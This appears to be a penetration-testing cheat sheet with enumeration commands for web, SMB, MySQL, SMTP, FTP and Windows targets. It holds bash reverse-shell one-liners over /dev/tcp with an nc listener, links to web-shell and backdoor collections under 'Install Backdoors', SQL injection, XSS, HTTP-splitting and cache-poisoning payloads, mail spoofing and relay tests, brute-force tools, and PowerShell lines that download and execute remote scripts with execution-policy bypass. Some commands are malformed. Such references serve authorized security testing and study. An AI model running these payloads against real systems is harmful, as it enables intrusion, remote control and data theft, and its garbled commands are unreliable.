Enumeration

General Enumeration:

nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1

Web Enumeration:

dirb http://192.168.0.1/usr/share/wordlists/dirb/common.txt

nikto –host http://192.168.0.1

Web Ports 80, 8080 etc. open

• Fingerprint server

  • Telnet ip_address port

  • Firefox plugins

    • All

      • firecat

    • Specific

      • add n edit cookies

      • asnumber

      • header spy

      • live http headers

      • shazou

      • web developer

• Crawl website

  • lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source

  • httprint

  • Metagoofil

    • metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

• Web Directory enumeration

  • Nikto

    • nikto [-h target] [options]

  • DirBuster

  • Wikto

  • Goolag Scanner

• Manual Tests

  • Default Passwords

  • Install Backdoors

    • ASP

      • http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt

    • Assorted

      • http://michaeldaw.org/projects/web-backdoor-compilation/

      • http://open-labs.org/hacker_webkit02.tar.gz

    • Perl

      • http://home.arcor.de/mschierlm/test/pmsh.pl

      • http://pentestmonkey.net/tools/perl-reverse-shell/

      • http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz

    • PHP

      • http://php.spb.ru/remview/

      • http://pentestmonkey.net/tools/php-reverse-shell/

      • http://pentestmonkey.net/tools/php-findsock-shell/

    • Python

      • http://matahari.sourceforge.net/

    • TCL

      • http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes

    • Bash Connect Back Shell

      • GnuCitizen

        • Atttack Box: nc -l -p Port -vvv

        • Victim: $ exec 5<>/dev/tcp/IP_Address/Port Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done

      • Neohapsis

        • Atttack Box: nc -l -p Port -vvv

        • Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin Victim: $ exec 1>&0 # Next we copy stdin to stdout Victim: $ exec 2>&0 # And finally stdin to stderr Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0

  • Method Testing

    • nc IP_Adress Port

      • HEAD / HTTP/1.0

      • OPTIONS / HTTP/1.0

      • PROPFIND / HTTP/1.0

      • TRACE / HTTP/1.1

      • PUT http://Target_URL/FILE_NAME

      • POST http://Target_URL/FILE_NAME HTTP/1.x

  • Upload Files

    • curl

      • curl -u <username:password> -T file_to_upload <Target_URL>

      • curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>

    • put.pl

      • put.pl -h target -r /remote_file_name -f local_file_name

    • webdav

      • cadaver

  • View Page Source

    • Hidden Values

    • Developer Remarks

    • Extraneous Code

    • Passwords!

  • Input Validation Checks

    • NULL or null

      • Possible error messages returned.

    • ' , " , ; , <!

      • Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.

    • – , = , + , "

      • Used to craft SQL Injection queries.

    • ‘ , &, ! , ¦ , < , >

      • Used to find command execution vulnerabilities.

    • "><script>alert(1)</script>

      • Basic Cross-Site Scripting Checks.

    • %0d%0a

      • Carriage Return (%0d) Line Feed (%0a)

        • HTTP Splitting

          • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>

            • i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>

        • Cache Poisoning

          • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>

    • %7f , %ff

      • byte-length overflows; maximum 7- and 8-bit values.

    • -1, other

      • Integer and underflow vulnerabilities.

    • %n , %x , %s

      • Testing for format string vulnerabilities.

    • ../

      • Directory Traversal Vulnerabilities.

    • % , _, *

      • Wildcard characters can sometimes present DoS issues or information disclosure.

    • Ax1024+

      • Overflow vulnerabilities.

  • Automated table and column iteration

    • orderby.py

      • ./orderby.py www.site.com/index.php?id=

    • d3sqlfuzz.py

      • ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--

SMB\RPC Enumeration:

enum4linux 10.0.0.1

nmap –script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse 192.168.0.1

Mysql Enumeration:

nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 192.168.0.1 -p 3306

SMTP Enumeration:

nmap –script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 192.168.0.1

• Port 25 open

  • Fingerprint server

    • telnet ip_address 25 (banner grab)

  • Mail Server Testing

    • Enumerate users

      • VRFY username (verifies if username exists - enumeration of accounts)

      • EXPN username (verifies if username is valid - enumeration of accounts)

    • Mail Spoof Test

      • HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT

    • Mail Relay Test

      • HELO anything

        • Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>

        • Unknown domain - mail from: <user@unknown_domain>

        • Domain not present - mail from: <user@localhost>

        • Domain not supplied - mail from: <user>

        • Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>

        • Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>

        • Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">

        • User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>

        • Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>

        • Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>

  • Examine Configuration Files

    • sendmail.cf

    • submit.cf

FTP Enumeration:

 nmap –script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 192.168.0.1

Is port 21 open?

• Fingerprint server

  • telnet ip_address 21 (Banner grab)

  • Run command ftp ip_address

  • ftp@example.com

  • Check for anonymous access

    • ftp ip_addressUsername: anonymous OR anonPassword: any@email.com

• Password guessing

  • Hydra brute force

  • medusa

  • Brutus

• Examine configuration files

  • ftpusers

  • ftp.conf

  • proftpd.conf

Windows Enumeration:

• Enable Remote Desktop (requires administrative privileges)

  • set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0

• Enable Firewall for Remote Desktop

  • Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

• Add a firewall rule

  • powershell.exe -command New-NetFirewallRule -s “Allow Inbound Port 80" -Direction Inbound –LocalPort 80 -Protocol TCP -Action Allow powershell.exe -command New-NetFirewallRule DisplayName"Block Outbound Port 80" -Direction Outbound –LocalPort 80 -Protocol TCP -Action Block

• View all services

  • powershell.exe -command Get-Service

• Restart service

  • powershell.exe -command Restart-Service

• Configure the DNS server

  • powershell.exe -command Get-Service SetDNSClientServerAddress -InterfaceAlias "Ethernet"-ServerAddresses 8.8.8.8

• Get a Process Listing

  • powershell.exe -command Get-Process

• Get a list of all computers from Active Directory

  • Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');Get-NetComputers

• Collection of information from the system, registries, and other information

  • Powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/nishang/master/Gather/GetInformation.ps1'); Get-Information"